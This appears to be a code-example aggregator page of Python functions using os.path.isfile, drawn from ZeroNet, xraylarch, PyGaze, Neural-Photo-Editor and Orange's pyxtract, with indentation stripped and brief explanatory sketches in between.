deleted += include_deleted # Add deleted files
# Save some memory
new_content["signs"] = None
if "cert_sign" in new_content:
new_content["cert_sign"] = None
if new_content.get("files_optional"):
self.has_optional_files = True
# Update the content
self.contents[content_inner_path] = new_content
except Exception, err:
self.log.warning("Content.json parse error: %s" % Debug.formatException(err))
return [], [] # Content.json parse error
# Add changed files to bad files
if add_bad_files:
for inner_path in changed:
self.site.bad_files[inner_path] = self.site.bad_files.get(inner_path, 0) + 1
for inner_path in deleted:
if inner_path in self.site.bad_files:
del self.site.bad_files[inner_path]
if new_content.get("modified", 0) > self.site.settings.get("modified", 0):
# Don't store modification times more than 10 minutes in the future
self.site.settings["modified"] = min(time.time() + 60 * 10, new_content["modified"])
return changed, deleted
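A minimal sketch of the existence check loadContent performs before parsing (load_json_if_present is a hypothetical helper, not a ZeroNet API): return None instead of raising when the content file is absent.
import json
import os

def load_json_if_present(path):
    # Parse the JSON file only when it exists as a regular file
    if not os.path.isfile(path):
        return None
    with open(path) as fp:
        return json.load(fp)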
0
Example 60
Project: xraylarch Source File: mda.py
def readMDA(fname, maxdim=4, verbose=0, help=0):
dim = []
if (not os.path.isfile(fname)):
fname = fname + '.mda'
if (not os.path.isfile(fname)):
print(fname," is not a file")
return dim
file = open(fname, 'rb')
# to read header for scan of up to 5 dimensions
buf = file.read(100)
u = xdrlib.Unpacker(buf)
# read file header
version = u.unpack_float()
scan_number = u.unpack_int()
rank = u.unpack_int()
dimensions = u.unpack_farray(rank, u.unpack_int)
isRegular = u.unpack_int()
pExtra = u.unpack_int()
pmain_scan = file.tell() - (len(buf) - u.get_position())
# collect 1D data
file.seek(pmain_scan)
dim.append(readScan(file, max(0,verbose-1)))
dim[0].dim = 1
if ((rank > 1) and (maxdim > 1)):
# collect 2D data
for i in range(dim[0].curr_pt):
file.seek(dim[0].plower_scans[i])
if (i==0):
dim.append(readScan(file, max(0,verbose-1)))
dim[1].dim = 2
# replace data arrays [1,2,3] with [[1,2,3]]
for j in range(dim[1].np):
data = dim[1].p[j].data
dim[1].p[j].data = []
dim[1].p[j].data.append(data)
for j in range(dim[1].nd):
data = dim[1].d[j].data
dim[1].d[j].data = []
dim[1].d[j].data.append(data)
else:
s = readScan(file, max(0,verbose-1))
# append data arrays
# [ [1,2,3], [2,3,4] ] -> [ [1,2,3], [2,3,4], [3,4,5] ]
for j in range(s.np): dim[1].p[j].data.append(s.p[j].data)
for j in range(s.nd): dim[1].d[j].data.append(s.d[j].data)
if ((rank > 2) and (maxdim > 2)):
# collect 3D data
for i in range(dim[0].curr_pt):
file.seek(dim[0].plower_scans[i])
s1 = readScan(file, max(0,verbose-1))
for j in range(s1.curr_pt):
file.seek(s1.plower_scans[j])
if ((i == 0) and (j == 0)):
dim.append(readScan(file, max(0,verbose-1)))
dim[2].dim = 3
# replace data arrays [1,2,3] with [[[1,2,3]]]
for k in range(dim[2].np):
data = dim[2].p[k].data
dim[2].p[k].data = [[]]
dim[2].p[k].data[0].append(data)
for k in range(dim[2].nd):
data = dim[2].d[k].data
dim[2].d[k].data = [[]]
dim[2].d[k].data[0].append(data)
else:
s = readScan(file, max(0,verbose-1))
# append data arrays
# if j==0: [[[1,2,3], [2,3,4]]] -> [[[1,2,3], [2,3,4]], [[3,4,5]]]
# else: [[[1,2,3], [2,3,4]]] -> [[[1,2,3], [2,3,4]], [[3,4,5]]]
for k in range(s.np):
if j==0: dim[2].p[k].data.append([])
dim[2].p[k].data[i].append(s.p[k].data)
for k in range(s.nd):
if j==0: dim[2].d[k].data.append([])
dim[2].d[k].data[i].append(s.d[k].data)
if ((rank > 3) and (maxdim > 3)):
# collect 4D data
for i in range(dim[0].curr_pt):
file.seek(dim[0].plower_scans[i])
s1 = readScan(file, max(0,verbose-1))
for j in range(s1.curr_pt):
file.seek(s1.plower_scans[j])
s2 = readScan(file, max(0,verbose-1))
for k in range(s2.curr_pt):
file.seek(s2.plower_scans[k])
if ((i == 0) and (j == 0) and (k == 0)):
dim.append(readScan(file, max(0,verbose-1)))
dim[3].dim = 4
for m in range(dim[3].np):
data = dim[3].p[m].data
dim[3].p[m].data = [[[]]]
dim[3].p[m].data[0][0].append(data)
for m in range(dim[3].nd):
data = dim[3].d[m].data
dim[3].d[m].data = [[[]]]
dim[3].d[m].data[0][0].append(data)
else:
s = readScan(file, max(0,verbose-1))
# append data arrays
if j==0 and k==0:
for m in range(dim[3].np):
dim[3].p[m].data.append([[]])
dim[3].p[m].data[i][0].append(s.p[m].data)
for m in range(dim[3].nd):
dim[3].d[m].data.append([[]])
dim[3].d[m].data[i][0].append(s.d[m].data)
else:
for m in range(dim[3].np):
if k==0: dim[3].p[m].data[i].append([])
dim[3].p[m].data[i][j].append(s.p[m].data)
for m in range(dim[3].nd):
if k==0: dim[3].d[m].data[i].append([])
dim[3].d[m].data[i][j].append(s.d[m].data)
# Collect scan-environment variables into a dictionary
dict = {}
dict['sampleEntry'] = ("description", "unit string", "value", "EPICS_type")
dict['filename'] = fname
dict['version'] = version
dict['scan_number'] = scan_number
dict['rank'] = rank
dict['dimensions'] = dimensions
dict['isRegular'] = isRegular
dict['ourKeys'] = ['sampleEntry', 'filename', 'version', 'scan_number', 'rank', 'dimensions', 'isRegular', 'ourKeys']
if pExtra:
file.seek(pExtra)
buf = file.read() # Read all scan-environment data
u = xdrlib.Unpacker(buf)
numExtra = u.unpack_int()
for i in range(numExtra):
name = ''
n = u.unpack_int() # length of name string
if n: name = u.unpack_string()
desc = ''
n = u.unpack_int() # length of desc string
if n: desc = u.unpack_string()
EPICS_type = u.unpack_int()
unit = ''
value = ''
count = 0
if EPICS_type != 0: # not DBR_STRING
count = u.unpack_int() #
n = u.unpack_int() # length of unit string
if n: unit = u.unpack_string()
if EPICS_type == 0: # DBR_STRING
n = u.unpack_int() # length of value string
if n: value = u.unpack_string()
elif EPICS_type == 32: # DBR_CTRL_CHAR
#value = u.unpack_fstring(count)
v = u.unpack_farray(count, u.unpack_int)
value = ""
for i in range(len(v)):
# treat the byte array as a null-terminated string
if v[i] == 0: break
value = value + chr(v[i])
elif EPICS_type == 29: # DBR_CTRL_SHORT
value = u.unpack_farray(count, u.unpack_int)
elif EPICS_type == 33: # DBR_CTRL_LONG
value = u.unpack_farray(count, u.unpack_int)
elif EPICS_type == 30: # DBR_CTRL_FLOAT
value = u.unpack_farray(count, u.unpack_float)
elif EPICS_type == 34: # DBR_CTRL_DOUBLE
value = u.unpack_farray(count, u.unpack_double)
dict[name] = (desc, unit, value, EPICS_type, count)
file.close()
dim.reverse()
dim.append(dict)
dim.reverse()
if verbose:
print("%s is a %d-D file; %d dimensions read in." % (fname, dim[0]['rank'], len(dim)-1))
print("dim[0] = dictionary of %d scan-environment PVs" % (len(dim[0])))
print(" usage: dim[0]['sampleEntry'] ->", dim[0]['sampleEntry'])
for i in range(1,len(dim)):
print("dim[%d] = %s" % (i, str(dim[i])))
print(" usage: dim[1].p[2].data -> 1D array of positioner 2 data")
print(" usage: dim[2].d[7].data -> 2D array of detector 7 data")
if help:
print(" ")
print(" each dimension (e.g., dim[1]) has the following fields: ")
print(" time - date & time at which scan was started: %s" % (dim[1].time))
print(" name - name of scan record that acquired this dimension: '%s'" % (dim[1].name))
print(" curr_pt - number of data points actually acquired: %d" % (dim[1].curr_pt))
print(" npts - number of data points requested: %d" % (dim[1].npts))
print(" nd - number of detectors for this scan dimension: %d" % (dim[1].nd))
print(" d[] - list of detector-data structures")
print(" np - number of positioners for this scan dimension: %d" % (dim[1].np))
print(" p[] - list of positioner-data structures")
print(" nt - number of detector triggers for this scan dimension: %d" % (dim[1].nt))
print(" t[] - list of trigger-info structures")
if help:
print(" ")
print(" each detector-data structure (e.g., dim[1].d[0]) has the following fields: ")
print(" desc - description of this detector")
print(" data - data list")
print(" unit - engineering units associated with this detector")
print(" fieldName - scan-record field (e.g., 'D01')")
if help:
print(" ")
print(" each positioner-data structure (e.g., dim[1].p[0]) has the following fields: ")
print(" desc - description of this positioner")
print(" data - data list")
print(" step_mode - scan mode (e.g., Linear, Table, On-The-Fly)")
print(" unit - engineering units associated with this positioner")
print(" fieldName - scan-record field (e.g., 'P1')")
print(" name - name of EPICS PV (e.g., 'xxx:m1.VAL')")
print(" readback_desc - description of this positioner")
print(" readback_unit - engineering units associated with this positioner")
print(" readback_name - name of EPICS PV (e.g., 'xxx:m1.VAL')")
return dim
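A small sketch of the extension-retry idiom readMDA uses above (resolve_mda_path is a hypothetical name): accept a path with or without the '.mda' suffix and report which one actually exists on disk.
import os

def resolve_mda_path(fname):
    # Return the path that exists on disk, trying the bare name first
    # and then the name with the '.mda' extension appended
    if os.path.isfile(fname):
        return fname
    if os.path.isfile(fname + '.mda'):
        return fname + '.mda'
    return None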
0
Example 61
def read_idf(filename, start, stop=None, missing=0.0, debug=False):
"""Returns a list with dicts for every trial. A trial dict contains the
following keys:
x - numpy array of x positions
y - numpy array of y positions
size - numpy array of pupil size
time - numpy array of timestamps, t=0 at trialstart
trackertime- numpy array of timestamps, according to the tracker
events - dict with the following keys:
Sfix - list of lists, each containing [starttime]
Ssac - EMPTY! list of lists, each containing [starttime]
Sblk - list of lists, each containing [starttime]
Efix - list of lists, each containing [starttime, endtime, duration, endx, endy]
Esac - EMPTY! list of lists, each containing [starttime, endtime, duration, startx, starty, endx, endy]
Eblk - list of lists, each containing [starttime, endtime, duration]
msg - list of lists, each containing [time, message]
NOTE: timing is in tracker time!
arguments
filename - path to the file that has to be read
start - trial start string
keyword arguments
stop - trial ending string (default = None)
missing - value to be used for missing data (default = 0.0)
debug - Boolean indicating if DEBUG mode should be on or off;
if DEBUG mode is on, information on what the script
currently is doing will be printed to the console
(default = False)
returns
data - a list with a dict for every trial (see above)
"""
# # # # #
# debug mode
if debug:
def message(msg):
print(msg)
else:
def message(msg):
pass
# # # # #
# file handling
# check if the file exists
if os.path.isfile(filename):
# open file
message("opening file '%s'" % filename)
f = open(filename, 'r')
# raise exception if the file does not exist
else:
raise Exception("Error in read_eyetribe: file '%s' does not exist" % filename)
# read file contents
message("reading file '%s'" % filename)
raw = f.readlines()
# close file
message("closing file '%s'" % filename)
f.close()
# # # # #
# parse lines
# variables
data = []
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
starttime = 0
started = False
trialend = False
filestarted = False
# loop through all lines
for i in range(len(raw)):
# string to list
line = raw[i].replace('\n','').replace('\r','').split('\t')
# check if the line starts with '##' (denoting header)
if '##' in line[0]:
# skip processing
continue
elif '##' not in line[0] and not filestarted:
# check the indexes for several key things we want to extract
# (we need to do this, because ASCII outputs of the IDF reader
# are different, based on whatever the user wanted to extract)
timei = line.index("Time")
typei = line.index("Type")
msgi = -1
xi = {'L':None, 'R':None}
yi = {'L':None, 'R':None}
sizei = {'L':None, 'R':None}
if "L POR X [px]" in line:
xi['L'] = line.index("L POR X [px]")
if "R POR X [px]" in line:
xi['R'] = line.index("R POR X [px]")
if "L POR Y [px]" in line:
yi['L'] = line.index("L POR Y [px]")
if "R POR Y [px]" in line:
yi['R'] = line.index("R POR Y [px]")
if "L Dia X [px]" in line:
sizei['L'] = line.index("L Dia X [px]")
if "R Dia X [px]" in line:
sizei['R'] = line.index("R Dia X [px]")
# set filestarted to True, so we don't attempt to extract
# this info on all consecutive lines
filestarted = True
# check if trial has already started
if started:
# only check for stop if there is one
if stop != None:
if (line[typei] == 'MSG' and stop in line[msgi]) or i == len(raw)-1:
started = False
trialend = True
# check for new start otherwise
else:
if start in line or i == len(raw)-1:
started = True
trialend = True
# # # # #
# trial ending
if trialend:
message("trialend %d; %d samples found" % (len(data),len(x)))
# trial dict
trial = {}
trial['x'] = numpy.array(x)
trial['y'] = numpy.array(y)
trial['size'] = numpy.array(size)
trial['time'] = numpy.array(time)
trial['trackertime'] = numpy.array(trackertime)
trial['events'] = copy.deepcopy(events)
# events
trial['events']['Sblk'], trial['events']['Eblk'] = blink_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
trial['events']['Sfix'], trial['events']['Efix'] = fixation_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
trial['events']['Ssac'], trial['events']['Esac'] = saccade_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
# add trial to data
data.append(trial)
# reset stuff
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
trialend = False
# check if the current line contains start message
else:
if line[typei] == "MSG":
if start in line[msgi]:
message("trialstart %d" % len(data))
# set started to True
started = True
# find starting time
starttime = int(line[timei])
# # # # #
# parse line
if started:
# message lines will usually start with a timestamp, followed
# by 'MSG', the trial number and the actual message, e.g.:
# "7818328012 MSG 1 # Message: 3"
if line[typei] == "MSG":
t = int(line[timei]) # time
m = line[msgi] # message
events['msg'].append([t,m])
# regular lines will contain tab separated values, beginning with
# a timestamp, followed by the values that were chosen to be
# extracted by the IDF converter
else:
# see if current line contains relevant data
try:
# extract data on POR and pupil size
for var in ['x', 'y', 'size']:
exec("vi = %si" % var)
exec("v = %s" % var)
# nothing
if vi['L'] == None and vi['R'] == None:
val = 'not in IDF'
# only left eye
elif vi['L'] != None and vi['R'] == None:
val = float(line[vi['L']])
# only right eye
elif vi['L'] == None and vi['R'] != None:
val = float(line[vi['R']])
# average the two eyes, but only if they both
# contain valid data
elif vi['L'] != None and vi['R'] != None:
if float(line[vi['L']]) == 0:
val = float(line[vi['R']])
elif float(line[vi['R']]) == 0:
val = float(line[vi['L']])
else:
val = (float(line[vi['L']]) + float(line[vi['R']])) / 2.0
v.append(val)
# extract time data
time.append(int(line[timei])-starttime)
trackertime.append(int(line[timei]))
except:
message("line '%s' could not be parsed" % line)
continue # skip this line
# # # # #
# return
return data
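The full reader above expects the IDF text export to already exist on disk; os.path.isfile is typically the guard used before any parsing starts. A minimal sketch of that guard, assuming a hypothetical read_idf entry point rather than the exact PyGaze signature:

import os.path

def read_idf(filename, start, stop=None, missing=0.0):
    # Fail loudly and early when the export is missing, instead of
    # crashing somewhere inside the line-by-line parser above.
    if not os.path.isfile(filename):
        raise Exception("Error in read_idf: file '%s' does not exist" % filename)
    with open(filename, 'r') as f:
        raw = f.readlines()
    data = []
    # ... tokenize raw lines and build per-trial dicts as in the example ...
    return data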
0
Example 62
Project: Neural-Photo-Editor Source File: train_IAN.py
def main(args):
# Load Config Module from source file
config_module = imp.load_source('config', args.config_path)
# Get configuration parameters
cfg = config_module.cfg
# Define name of npz file to which the model parameters will be saved
weights_fname = str(args.config_path)[:-3]+'.npz'
# Define the name of the jsonl file to which the training log will be saved
metrics_fname = weights_fname[:-4]+'METRICS.jsonl'
# Prepare logs
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s| %(message)s')
logging.info('Metrics will be saved to {}'.format(metrics_fname))
mlog = metrics_logging.MetricsLogger(metrics_fname, reinitialize=(not args.resume))
model = config_module.get_model(interp=False)
logging.info('Compiling theano functions...')
# Compile functions
tfuncs, tvars,model = make_training_functions(cfg,model)
# Shuffle Initial masks
model['l_IAF_mu'].shuffle("Once")
model['l_IAF_ls'].shuffle("Once")
logging.info('Training...')
# Iteration Counter, indicates total number of minibatches processed
itr = 0
# Best validation accuracy variable
best_acc = 0
# Test set for interpolations
test_set = CelebA('64',('test',),sources=('features',))
# Loop across epochs
offset = True
params = list(set(lasagne.layers.get_all_params(model['l_out'],trainable=True)+\
lasagne.layers.get_all_params(model['l_discrim'],trainable=True)+\
[x for x in lasagne.layers.get_all_params(model['l_out'])+\
lasagne.layers.get_all_params(model['l_discrim'])if x.name[-4:]=='mean' or x.name[-7:]=='inv_std']))
if os.path.isfile(weights_fname) and args.resume:
metadata = GANcheckpoints.load_weights(weights_fname, params)
min_epoch = metadata['epoch']+1 if 'epoch' in metadata else 0
new_lr = metadata['learning_rate'] if 'learning_rate' in metadata else cfg['lr_schedule'][0]
tvars['learning_rate'].set_value(np.float32(new_lr))
print('loading weights, epoch is '+str(min_epoch),'lr is '+str(new_lr)+'.')
else:
min_epoch = 0
# Ratio of gen updates to discrim updates
update_ratio = cfg['update_ratio']
n_shuffles = 0
for epoch in xrange(min_epoch,cfg['max_epochs']):
offset = not offset
# Get generator for data
loader = data_loader(cfg,
CelebA('64',('train',),sources=('features',)),
offset=offset*cfg['batch_size']//2,shuffle=cfg['shuffle'],
seed=epoch) # Does this need to happen every epoch?
# Update Learning Rate, either with annealing schedule or decay rate
if isinstance(cfg['learning_rate'], dict) and epoch > 0:
if any(x==epoch for x in cfg['learning_rate'].keys()):
lr = np.float32(tvars['learning_rate'].get_value())
new_lr = cfg['learning_rate'][epoch]
logging.info('Changing learning rate from {} to {}'.format(lr, new_lr))
tvars['learning_rate'].set_value(np.float32(new_lr))
if cfg['decay_rate'] and epoch > 0:
lr = np.float32(tvars['learning_rate'].get_value())
new_lr = lr*(1-cfg['decay_rate'])
logging.info('Changing learning rate from {} to {}'.format(lr, new_lr))
tvars['learning_rate'].set_value(np.float32(new_lr))
# Number of Chunks
iter_counter = 0
# Epoch-Wise Metrics
# vloss_e, floss_e, closs_e, a_g_loss_e, a_d_loss_e, d_kl_e, c_acc_e, acc_e = 0, 0, 0, 0, 0, 0, 0, 0
# Loop across all chunks
for x_shared in loader:
# Increment Chunk Counter
iter_counter+=1
# Figure out number of batches
num_batches = len(x_shared)//cfg['batch_size']
# Shuffle chunk
# np.random.seed(42*epoch)
index = np.random.permutation(len(x_shared))
# Load data onto GPU
tvars['X_shared'].set_value(x_shared[index], borrow=True)
tvars['Z_shared'].set_value(np.float32(np.random.randn(len(x_shared),cfg['num_latents'])),borrow=True)
# Ternary adversarial objectives
tvars['p1'].set_value(np.asarray([[1,0,0]]*len(x_shared),dtype=np.int32))
tvars['p2'].set_value(np.asarray([[0,1,0]]*len(x_shared),dtype=np.int32))
tvars['p3'].set_value(np.asarray([[0,0,1]]*len(x_shared),dtype=np.int32))
# Chunk Metrics
metrics = OrderedDict()
for gkey in tvars['gd']:
metrics[gkey] = []
for dkey in tvars['dd']:
metrics[dkey] = []
# Loop across all batches in chunk
for bi in xrange(num_batches):
# Train and record metrics
if itr % (update_ratio+1)==0:
gen_out = tfuncs['update_gen'](bi)
for key,entry in zip(tvars['gd'],gen_out):
metrics[key].append(entry)
else:
d_out = tfuncs['update_discrim'](bi)
for key,entry in zip(tvars['dd'],d_out):
metrics[key].append(entry)
itr += 1
for key in metrics:
metrics[key] = float(np.mean(metrics[key]))
# Chunk-wise metrics
if (iter_counter-1) % 50 ==0:
title = 'epoch itr '
form = []
for item in metrics:
title = title+' '+str(item)
form.append(len(str(item)))
logging.info(title)
log_output = '%4d '%epoch + '%6d '%itr
for f,item in zip(form,metrics):
e = '%'+str(f)+'.4f'
log_output = log_output+' '+e%metrics[item]
logging.info(log_output)
# logging.info('epoch: {:4d}, itr: {:8d}, ag_loss: {:7.4f}, adg_loss: {:7.4f}, add_loss: {:7.4f}, acc: {:5.3f}, ploss: {:7.4f}, pacc: {:5.3f}'.format(epoch,itr,agloss,adgloss,addloss,accuracy,ploss,pixel_accuracy))
mlog.log(epoch=epoch,itr=itr,metrics=metrics)
# Log Chunk Metrics
# If we see improvement, save weights and produce output images
# if cfg['reconstruct'] or cfg['introspect']:
if not (epoch%cfg['checkpoint_every_nth']):
# Open Test Set
test_set.open()
np.random.seed(epoch*42+5)
# Generate Random Samples, averaging latent vectors across masks
samples = np.uint8(from_tanh(tfuncs['sample'](np.random.randn(27,cfg['num_latents']).astype(np.float32))))
np.random.seed(epoch*42+5)
# Get Reconstruction/Interpolation Endpoints
endpoints = np.uint8(test_set.get_data(request = list(np.random.choice(test_set.num_examples,6,replace=False)))[0])
# Get reconstruction latents
Ze = np.asarray(tfuncs['Zfn'](to_tanh(np.float32(endpoints))))
# Get Interpolant Latents
Z = np.asarray([Ze[2 * i, :] * (1 - j) + Ze[2 * i + 1, :] * j for i in range(3) for j in [x/6.0 for x in range(7)]],dtype=np.float32)
# Get all images
images = np.append(samples,np.concatenate([np.insert(endpoints[2*i:2*(i+1),:,:,:],1,np.uint8(from_tanh(tfuncs['sample'](Z[7*i:7*(i+1),:]))),axis=0) for i in range(3)],axis=0),axis=0)
# Plot images
plot_image_grid(images,6,9,'pics/'+str(args.config_path)[:-3]+'_'+str(epoch)+'.png')
# Close test set
test_set.close(state=None)
# Save weights
params = list(set(lasagne.layers.get_all_params(model['l_out'],trainable=True)+\
lasagne.layers.get_all_params(model['l_discrim'],trainable=True)+\
[x for x in lasagne.layers.get_all_params(model['l_out'])+\
lasagne.layers.get_all_params(model['l_discrim'])if x.name[-4:]=='mean' or x.name[-7:]=='inv_std']))
GANcheckpoints.save_weights(weights_fname, params,{'epoch':epoch,'itr': itr, 'ts': time.time(),'learning_rate':np.float32(tvars['learning_rate'].get_value())})
logging.info('training done')
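The os.path.isfile call near the top of this example gates checkpoint recovery: previously saved weights and the stored epoch and learning rate are only reloaded when the .npz file exists and --resume was requested. A stripped-down sketch of that resume pattern, using a hypothetical JSON sidecar instead of the GANcheckpoints helpers:

import json
import os.path

def starting_epoch(weights_fname, resume):
    # Resume only when the user asked for it and the checkpoint is actually on disk.
    meta_fname = weights_fname[:-4] + '.meta.json'   # hypothetical metadata file
    if resume and os.path.isfile(weights_fname) and os.path.isfile(meta_fname):
        with open(meta_fname) as f:
            metadata = json.load(f)
        return metadata.get('epoch', -1) + 1
    return 0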
0
Example 63
Project: orange Source File: pyxtract.py
def writeAppendix(filename, targetname, classdefs, aliases):
if ( not recreate
and os.path.isfile(targetname)
and (os.path.getmtime(targetname)>=os.path.getmtime(filename))
and (os.path.getmtime(targetname)>=os.path.getmtime("aliases.txt"))):
printV1("\nFile unchanged, skipping.")
return
usedbases={}
classdefi=classdefs.items()
classdefi.sort(lambda x,y:cmp(x[0],y[0]))
basecount=0
for (type, fields) in classdefi:
if fields.infile==filename:
usedbases[fields.basetype]=1
basecount += 1
if usedbases.has_key("ROOT"):
del usedbases["ROOT"]
if not basecount:
if os.path.isfile(targetname):
os.remove(targetname)
printV1("\nFile does not define any classes, removing.")
else:
printV1("\nFile does not define any classes, skipping.")
return
printV1("\nConstructing class definitions")
outfile=open("px/"+targetname+".new", "wt")
newfiles.append(targetname)
outfile.write("/* This file was generated by pyxtract \n Do not edit.*/\n\n")
outfile.write('#include <cstddef>\n\n')
usedbases=usedbases.keys()
usedbases.sort()
#outfile.write("extern TOrangeType PyOrOrangeType_Type;\n")
for type in usedbases:
if type:
if classdefs[type].imported:
outfile.write("extern IMPORT_DLL TOrangeType PyOr"+type+"_Type;\n")
else:
outfile.write("extern %s_API TOrangeType PyOr%s_Type;\n" % (modulename.upper(), type))
outfile.write("\n\n")
for (type, fields) in classdefi:
if fields.infile!=filename:
continue
outfile.write('/* -------------- %s --------------*/\n\n' % type)
# Write PyMethodDef
if len(fields.methods):
methodnames=fields.methods.keys()
methodnames.sort()
outfile.write("PyMethodDef "+type+"_methods[] = {\n")
for methodname in methodnames:
method=fields.methods[methodname]
cname = method.cname[0] == "*" and method.cname[1:] or type+"_"+method.cname
if method.arguments:
outfile.write(' {"'+methodname+'", (binaryfunc)'+cname+", "+method.argkw+", \""+method.arguments+"\"},\n")
else:
outfile.write(' {"'+methodname+'", (binaryfunc)'+cname+", "+method.argkw+"},\n")
outfile.write(" {NULL, NULL}\n};\n\n")
# Write GetSetDef
properties=filter(lambda (name, definition): not definition.builtin, fields.properties.items())
if len(properties):
properties.sort(lambda x,y:cmp(x[0], y[0]))
outfile.write("PyGetSetDef "+type+"_getset[]= {\n")
for (name, definition) in properties:
camelname = camel2underscore(name)
outfile.write(' {"%s"' % camelname)
if definition.hasget:
outfile.write(", (getter)%s_get_%s" % (type, name))
else:
outfile.write(", NULL")
if definition.hasset:
outfile.write(", (setter)%s_set_%s" % (type, name))
else:
outfile.write(", NULL")
if definition.description:
outfile.write(', "'+definition.description+'"')
outfile.write("},\n")
outfile.write(' {NULL}};\n\n')
# Write doc strings
if fields.call and fields.call.arguments and len(fields.call.arguments):
outfile.write('char '+type+'[] = "'+fields.call.arguments+'";\n')
if fields.description:
outfile.write('char '+type+'_doc[] = "'+fields.description+'";\n')
outfile.write('\n')
if fields.subconstants:
for constname, constvalues in fields.subconstants.items():
outfile.write("""
TNamedConstantsDef %(wholename)s_values[] = {%(valueslist)s, {0, 0}};
static PyObject *%(wholename)s_repr(PyObject *self) { return stringFromList(self, %(wholename)s_values); }
PyObject *%(wholename)s__reduce__(PyObject *self);
PyMethodDef %(wholename)s_methods[] = { {"__reduce__", (binaryfunc)%(wholename)s__reduce__, METH_NOARGS, "reduce"}, {NULL, NULL}};
PyTypeObject Py%(wholename)s_Type = {PyObject_HEAD_INIT(&PyType_Type) 0, "%(classname)s.%(constname)s", sizeof(PyIntObject), 0, 0, 0, 0, 0, 0, (reprfunc)%(wholename)s_repr, 0, 0, 0, 0, 0, (reprfunc)%(wholename)s_repr, 0, 0, 0, Py_TPFLAGS_DEFAULT | Py_TPFLAGS_CHECKTYPES, 0, 0, 0, 0, 0, 0, 0, %(wholename)s_methods, 0, 0, &PyInt_Type, 0, 0, 0, 0, 0, 0, 0, PyObject_Del};
PyObject *Py%(wholename)s_FromLong(long ok) { PyIntObject *r = PyObject_New(PyIntObject, &Py%(wholename)s_Type); r->ob_ival = ok; return (PyObject *)r; }
void *PT%(wholename)s(void *l) { return Py%(wholename)s_FromLong(*(int *)l); }
PyObject *%(wholename)s__reduce__(PyObject *self) { return Py_BuildValue("O(s(i))", getExportedFunction("__pickleLoaderNamedConstants"), "%(wholename)s", ((PyIntObject *)(self))->ob_ival); }
""" % {"wholename": type+"_"+constname, "classname": type, "constname": constname, "valueslist": ", ".join('{"%s", %s}' % k for k in constvalues)})
#PyObject *%(wholename)s__reduce__(PyObject *self) { return Py_BuildValue("O(i)", &PyInt_Type, ((PyIntObject *)(self))->ob_ival); }
# Write constants
if fields.constants:
outfile.write("void %s_addConstants()\n{ PyObject *&dict = PyOr%s_Type.ot_inherited.tp_dict;\n if (!dict) dict = PyDict_New();\n" % (type, type))
for name, const in fields.constants.items():
if const.ccode:
outfile.write(' PyDict_SetItemString(dict, "%s", %s);\n' % (name, const.ccode))
else:
outfile.write(' PyDict_SetItemString(dict, "%s", %s());\n' % (name, const.cfunc))
outfile.write("}\n\n")
# Write default constructor
if fields.constructor:
if fields.constructor.type!="MANUAL":
outfile.write('POrange %s_default_constructor(PyTypeObject *type)\n{ return POrange(mlnew T%s(), type); }\n\n' % (type, type))
else:
outfile.write('PyObject *%s_abstract_constructor(PyTypeObject *type, PyObject *args, PyObject *kwds)\n{ return PyOrType_GenericAbstract((PyTypeObject *)&PyOr%s_Type, type, args, kwds); }\n\n' % (type, type))
# Write constructor keywords
if fields.constructor_keywords:
outfile.write('char *%s_constructor_keywords[] = {%s, NULL};\n' % (type, reduce(lambda x, y: x + ", " + y, ['"%s"' % x for x in fields.constructor_keywords])))
if fields.recognized_attributes:
outfile.write('char *%s_recognized_attributes[] = {%s, NULL};\n' % (type, reduce(lambda x, y: x + ", " + y, ['"%s"' % x for x in fields.recognized_attributes])))
outfile.write('\n')
# Write aliases
if aliases.has_key(type):
outfile.write("TAttributeAlias "+type+"_aliases[] = {\n")
for alias in aliases[type]:
outfile.write(' {"%s", "%s"},\n' % tuple(alias))
outfile.write(" {NULL, NULL}};\n\n")
# Write type object
def hasany(methods, fields):
for smethod in methods:
if smethod[0] and fields.specialmethods.has_key(smethod[0]):
return 1
return 0
def writeslots(methods, isbase=0):
def write0(innulls):
outfile.write(innulls and ' 0,' or ' 0,')
return 1
innulls=0
for smethod in methods:
if not smethod[0]:
if smethod[1]=="BASE":
if fields.basetype and (fields.basetype!="ROOT"):
name='(_typeobject *)&PyOr'+fields.basetype+'_Type,'
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* tp_base */\n' % name))
else:
innulls=write0(innulls)
elif smethod[1]=="DICTOFFSET":
if fields.dictfield and fields.dictfield!="0":
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* tp_dictoffset */\n' % ("offsetof(%s, %s)," % (fields.datastructure, fields.dictfield))))
else:
innulls=write0(innulls)
elif smethod[1]=="DOC":
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* tp_doc */\n' % ('"'+findConstructorDoc(classdefs, type)+'",')))
elif smethod[1]=="FLAGS":
fl = "Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_RICHCOMPARE"
for cond, flag in [(fields.specialmethods.has_key("traverse"), "Py_TPFLAGS_HAVE_GC")
]:
if cond:
fl += " | "+flag
innulls=outfile.write((innulls and '\n' or '') + (' %s, /* tp_flags */\n' % fl))
else:
otherfields= [("as_number", hasnumeric),
("as_sequence", hassequence),
("as_mapping", hasmapping),
("doc", fields.description),
("methods", fields.methods),
("getset", len(properties))
]
for (name, condition) in otherfields:
if smethod[1]==name:
if condition:
slotcont='%s_%s,' % (type, name)
if name[:3]=="as_":
slotcont="&"+slotcont
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* tp_%s */\n' % (slotcont, name)))
else:
innulls=write0(innulls)
break
else:
if len(smethod)==3:
if smethod[2]=='0':
innulls=write0(innulls)
else:
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* %s */\n' % (smethod[2]+',', smethod[1])))
else:
raise "invalid slot name %s" % smethod[1]
else: # smethod[0]!=""
if fields.specialmethods.has_key(smethod[0]):
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* %s */\n' % ("(%s)%s_%s," % (smethod[2], type, smethod[0]), smethod[1])))
elif smethod[0]=="new":
if fields.constructor:
